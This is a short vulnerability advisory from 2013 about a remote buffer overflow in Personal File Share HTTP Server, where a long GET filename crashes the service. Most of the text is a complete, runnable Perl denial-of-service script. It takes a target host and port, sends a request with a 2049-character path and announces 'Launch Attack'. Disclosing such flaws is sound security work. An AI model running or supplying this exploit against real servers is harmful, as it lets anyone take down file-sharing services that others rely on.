Personal File Share HTTP server suffers from a remote buffer overflow vulnerability. Proof of concept denial of service code included.
35ab66e9b48e819eccea9de3c3b1264a3321487f6247141d750c465f46ab2f37
Title: Personal File Share HTTP Server Remote Overflow Vulnerability
Software : Personal File Share HTTP Server
Software Version : UNKNOWN
Vendor: http://www.srplab.com/
Vulnerability Published : 2013-04-28
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
Personal file sharing is a convenient tool for sharing files with other mobile, tablet, or pc. It supports all web browsers.
Other machines can browse or download files using web browser easily.
This software is possible for remote attackers to send a request with GET command and a long string as filename under root dictionary
that will lead to a Denial Of Service flaw for the HTTP service.
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#Personal File Share HTTP Server Remote Overflow Vulnerability Exploit
#Written by demonalex@163.com
use IO::Socket;
$|=1;
$host=shift || die "$0 \$host \$port\n";
$port=shift || die "$0 \$host \$port\n";
$evil = 'A'x2049;
$payload =
"GET /"."$evil"." HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: "."$host:$port"."\r\n".
"Connection: Keep-Alive\r\n\r\n";
print "Launch Attack ... ";
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n";
if(defined($sock1)){
$sock1->send("$payload", 0);
$sock1->close;
}
print "Finish!\n";
exit(1);
-----------------------------------------------------------
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Independent Researcher
DBAPPSecurity Co.,Ltd./Hong Kong PolyU